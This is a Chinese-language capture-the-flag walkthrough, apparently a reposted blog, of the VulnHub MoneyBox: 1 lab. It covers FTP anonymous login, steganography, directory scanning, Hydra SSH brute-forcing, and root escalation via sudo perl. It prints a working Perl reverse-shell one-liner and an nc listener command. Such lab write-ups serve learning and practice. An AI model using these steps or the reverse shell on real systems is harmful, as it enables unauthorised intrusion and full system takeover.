前言

• 這是vulnhub上的一個(gè)簡單靶場(chǎng)，網(wǎng)上沖浪的時(shí)候發(fā)現(xiàn)就下載下來做了一下，發(fā)點(diǎn)靶場(chǎng)的滲透過程，就當(dāng)是學(xué)習(xí)筆記了。
  靶場(chǎng)地址http://www.vulnhub.com/entry/moneybox-1,653/#download
• 如果VMware里配置靶場(chǎng)環(huán)境有問題的話就下個(gè)Virtualbox，把靶機(jī)的ova文件導(dǎo)入到Virtualbox里。
  Virtualbox的下載路徑https://www.virtualbox.org/

配置靶場(chǎng)環(huán)境時(shí)遇到的坑

在導(dǎo)入ova文件到Virtualbox的時(shí)候會(huì)遇到的一個(gè)問題，導(dǎo)入的界面太大了，下面的選項(xiàng)看不到，這時(shí)候調(diào)一下分辨率或者直接回車就可以了。

我導(dǎo)入的時(shí)候還會(huì)遇到這個(gè)報(bào)錯(cuò)，點(diǎn)擊更改網(wǎng)絡(luò)設(shè)置在選好自己的網(wǎng)卡重新來一遍就好了。

遇到這個(gè)報(bào)錯(cuò)就打開靶場(chǎng)環(huán)境的設(shè)置在USB設(shè)備處，把啟用USB控制器選項(xiàng)關(guān)了就行。

開始打靶

內(nèi)網(wǎng)ip有點(diǎn)多，就指定22，21端口來分辨一下哪個(gè)是靶機(jī)，看到192.168.0.107的22，21端口都開了，多半是靶機(jī)了。

掃描全端口和詳細(xì)的端口信息
看到ftp和ssh服務(wù)就想到暴力破解了，打開超級(jí)弱口令檢測(cè)工具，簡單爆破一下看看有沒有發(fā)現(xiàn)。（工具會(huì)在附件分享）

爆破到了ftp的賬號(hào)密碼，這是ftp的允許匿名登陸，密碼為空也是可以的。
ftp 192.168.0.107 輸入賬號(hào)anonymous，密碼為空或者anonymous1234也可以，連接上ftp后ls一下，看看有什么內(nèi)容。

把圖片下載下來，圖片名字trytofind，我們看看這張圖片有沒有用到CTF中常見的隱寫術(shù)。

雖然查到了圖片中的文件，但是查看文件需要密碼，ftp這條線索到此就斷了。
我們既然ssh沒爆破出來就去看看80端口好了，打開瀏覽器訪問。
80端口的網(wǎng)站主頁也沒什么有用的信息，查看網(wǎng)頁源代碼也沒發(fā)現(xiàn)

那就目錄掃描看看吧，用dirsearch目錄掃描，個(gè)人感覺比御劍好多很多。

除了網(wǎng)站首頁還掃到一個(gè)bolgs目錄，訪問看看，看似沒什么有用的信息，查看網(wǎng)頁源代碼，拉到最下面。

這段洋屁的意思呢是說還有個(gè)叫S3cr3t-T3xt的隱藏目錄，訪問看看

找到密鑰3xtr4ctd4t4，重新回到查看圖片隱寫處，輸入密鑰

cat查看圖片中隱藏的data.txt，這是一封信件的格式，是告訴renu說他的密碼太過于簡單了，我們結(jié)合ssh端口。把用戶名定位renu，用hydra爆破，這里爆破用的密碼字典是kali自帶的，如果沒解壓過的可以解壓一下。

得到賬號(hào)密碼,renu 987654321
ssh renu@192.168.0.107連接靶機(jī)
連接到之后ls一下，user1.txt就是第一個(gè)flag

嘗試su到root權(quán)限失敗，查看有什么可以用root權(quán)限執(zhí)行的命令也沒有，好像線索又?jǐn)嗔?#xff0c;查看一下history歷史命令。

歷史命令里有cd到home目錄下的lily賬號(hào)，又有把密鑰發(fā)送給192.168.43.80的lily賬號(hào)，我懷疑這里是靶場(chǎng)設(shè)置的錯(cuò)誤了，沒道理突然來個(gè)別的段的ip地址還跟本地有一個(gè)同樣叫l(wèi)ily的賬號(hào)。如果是設(shè)置錯(cuò)誤，那就是把生成的密鑰發(fā)送給了本地的lily賬戶，如果是這樣的話就能不用賬號(hào)密碼，用密鑰就能夠登錄lily賬戶，為了驗(yàn)證這個(gè)猜想,執(zhí)行ssh lily@127.0.0.1

成功連接后ls一下，拿下第二個(gè)flag。再試試能不能在lily賬戶上su到root，再次失敗了，sudo -l查看一下能sudo使用的命令。

lily用戶能用sudo執(zhí)行/usr/bin/perl
而perl可以反彈shell到kali攻擊機(jī)上了，因?yàn)槭莝udo管理員權(quán)限啟動(dòng)的反彈shell，所以shell也是root權(quán)限的，網(wǎng)上找一條perl反彈shell的命令。

在lily用戶的命令行輸入
sudo perl -e ‘use Socket;$i=”你的攻擊機(jī)ip地址”;$p=你監(jiān)聽的端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};’

在攻擊機(jī)監(jiān)聽
nc -nvlp 你的監(jiān)聽端口

收到shell，我以為就在root目錄下ls一下就能看到最后一個(gè)flag了，然而最后一個(gè)flag是隱藏的文件，在root根目錄下執(zhí)行l(wèi)s -a才能看見。

總結(jié)

滲透還是要多實(shí)操，有時(shí)候腦子沒記住的，手記住了。
最后，求點(diǎn)贊

總結(jié)

以上是生活随笔為你收集整理的MONEYBOX: 1靶场打靶的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。